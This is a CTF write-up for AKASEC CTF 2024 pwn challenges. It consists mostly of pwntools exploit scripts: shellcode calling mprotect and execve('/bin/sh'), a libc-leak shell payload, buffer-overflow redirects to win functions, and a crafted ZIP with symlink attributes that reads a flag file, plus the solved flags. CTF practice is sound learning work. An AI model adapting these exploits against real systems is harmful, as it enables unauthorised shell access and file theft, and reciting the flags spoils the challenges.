# (writeup) AKASEC CTF 2024

## good-trip

```py
#!/usr/bin/python3

from pwn import *

exe = ELF('./good_trip', checksec=False)
context.binary = exe

info = lambda msg: log.info(msg)
sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
sln = lambda msg, num: sla(msg, str(num).encode())
sn = lambda msg, num: sa(msg, str(num).encode())

def GDB():
    if not args.REMOTE:
        gdb.attach(p, gdbscript='''
        b*exec+64
        c
        ''')
        input()

if args.REMOTE:
    p = remote('172.210.129.230',1351)
else:
    p = process(exe.path)

GDB()

sla(b'size >> ',str(0x1000))

pl = asm(f"""
    mov rsp, 0x404a00
    mov rdi, 0x1337131000
    mov rsi, 0x1000
    mov rdx, 7
    mov rcx, {exe.plt.mprotect}
    call rcx
    xor rdi, rdi
    mov rsi, 0x1337131048
    mov rdx, 0x100
    mov rcx, {exe.plt.read}
    call rcx
    nop
    nop
    nop
""",arch='amd64')

pl2 = asm(f"""
    mov rbx, 29400045130965551
    push rbx
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 0x3b
    syscall
""",arch='amd64')

payload = pl
sa(b'>> ',payload)
sleep(2)
s(pl2)

p.interactive()

#AKASEC{y34h_You_C4N7_PRO73C7_5om37hIn9_YoU_doN7_h4V3}
```

>AKASEC{y34h_You_C4N7_PRO73C7_5om37hIn9_YoU_doN7_h4V3}

## bad-trip

```py
#!/usr/bin/python3

from pwn import *

exe = ELF('./bad_trip_patched', checksec=False)
libc = ELF('./libc.so.6',checksec=False)
context.binary = exe

info = lambda msg: log.info(msg)
sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
sln = lambda msg, num: sla(msg, str(num).encode())
sn = lambda msg, num: sa(msg, str(num).encode())

def GDB():
    if not args.REMOTE:
        gdb.attach(p, gdbscript='''
        b*exec+71
        c
        ''')
        input()

if args.REMOTE:
    p = remote('172.210.129.230',1352)
else:
    p = process(exe.path)

# GDB()

p.recvuntil(b'with ')
leak = int(p.recvuntil(b'\n',drop=True),16)
info("leak: " + hex(leak))
libc_leak = 0x7fcb00000000 | leak
libc.address = libc_leak - libc.sym.puts
info("libc leak: " + 
hex(libc_leak))
info("libc base: " + hex(libc.address))

pl = asm(f"""
    mov rdi, [fs:0x300]
    add rdi, 120
    mov rdi, [rdi]
    sub rdi, 163210
    add rdi,0x111709
    mov rsp, 0x6969696a10
    mov rcx, rdi
    mov rbx, 29400045130965551
    push rbx
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 0x3b
    call rcx
""",arch='amd64')

payload = pl
sa(b'>> ',payload)

p.interactive()

#AKASEC{pr3f37CH3M_Li8C_4Ddr35532}
```

>AKASEC{pr3f37CH3M_Li8C_4Ddr35532}

## the_absolute_horror_of_the_trip

- tương tự bài bad-trip
- script không khác gì =)))

>AKASEC{NoW_You_r34lly_H4V3_7o_pr3F37cH3M_li8C_4DDR5}

## yapping

```py
#!/usr/bin/python3

from pwn import *

exe = ELF('challenge', checksec=False)
context.binary = exe

info = lambda msg: log.info(msg)
sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
sln = lambda msg, num: sla(msg, str(num).encode())
sn = lambda msg, num: sa(msg, str(num).encode())

def GDB():
    if not args.REMOTE:
        gdb.attach(p, gdbscript='''
        b* 0x401256
        c
        ''')
        input()

if args.REMOTE:
    p = remote('20.80.240.190',14124)
else:
    p = process(exe.path)

GDB()

payload = b'a'*108 + p32(0x70) + p64(0x4011f4)
s(payload)

payload = b"a"*88 + flat(0x4011f1, exe.sym.user+0x70) + b'a'*4 + p32(0x70) + p64(exe.sym.win)
s(payload)

payload = b'a'*108 + p32(0x70) + p64(0x4011f4)
s(payload)

payload = b'admin\0\0\0'.ljust(108) + p32(0x70) + p64(exe.sym.win)
s(payload)

p.interactive()

#AKASEC{y4pp1n6_15_50m371m35_u53full_9b9b3d9}
```

>AKASEC{y4pp1n6_15_50m371m35_u53full_9b9b3d9}

## zop

```py
#!/usr/bin/python3

from pwn import *
import os
import base64

sla = lambda delim, data: p.sendlineafter(delim, data)
sa = lambda delim, data: p.sendafter(delim, data)
s = lambda data: p.send(data)
sl = lambda data: p.sendline(data)
r = lambda nbytes: p.recv(nbytes)
ru = lambda data: p.recvuntil(data)
rl = lambda : p.recvline()

elf = context.binary = ELF('zop')

def int_from_bytes(bytes):
    return int.from_bytes(bytes, 
                          byteorder='little')

def GDB(proc):
    gdb.attach(p, gdbscript='''
    b extract_zip
    b parse_lfh
    c
    ''')

#context.log_level = 'debug'

file = b'AAAAA'*0x20
f = open('content/a', 'wb')
f.write(file)
f.close()
f = open('content/b', 'wb')
f.write(file)
f.close()

os.system("zip a.zip content/a")
f = open('a.zip', 'rb')
content = f.read()
f.close()
print(content)

file_name = b'hahaha\x00'
extra_feild_len = b'hihi\x00'
data_ = b'/chal/flag.txt\x00'

content = p32(67324752) # signature
content += p16(0) # version
content += p16(0) # flag
content += p16(0) # compression
content += p16(0) # mod time
content += p16(0) # mod_date
content += p32(0) # checksum
content += p32(0) # compressed size
content += p32(len(data_)) # uncompressed size
content += p16(len(file_name)) # fname_len
content += p16(len(extra_feild_len)) # extra_feild_len
content += file_name
content += extra_feild_len
content += data_

extra = b'aaa\x00'
comm = b'aaa\x00'
symbol = b'/chal/flag.txt\x00'

content += p32(33639248) # signature
content += p16(0) #version
content += p16(0) # version_need
content += p16(0) #flag
content += p16(0) # compress
content += p16(0) # mod_time
content += p16(0) # mod_date
content += p32(0) # checksum
content += p32(0) # compmress size
content += p32(len(symbol)) # uncompress size
content += p16(len(file_name)) # fname_len
content += p16(len(extra)) # extra_feild_len
content += p16(len(comm)) # file_comm_len
content += p16(0) # disk_start
content += p16(0) # internal_attrs
content += p32(0xa0000000) # external_attrs
content += p32(0) # local_header
content += file_name + extra + comm

payload = base64.b64encode(content)

#p = remote('0', 1349)
p = remote('172.210.129.230', 1349)
#p = process()
#GDB(p)

sla(b'file', payload)

p.interactive()

#AKASEC{I7_wa5_700_0BVi0u5_ri9H7?}
```

>AKASEC{I7_wa5_700_0BVi0u5_ri9H7?}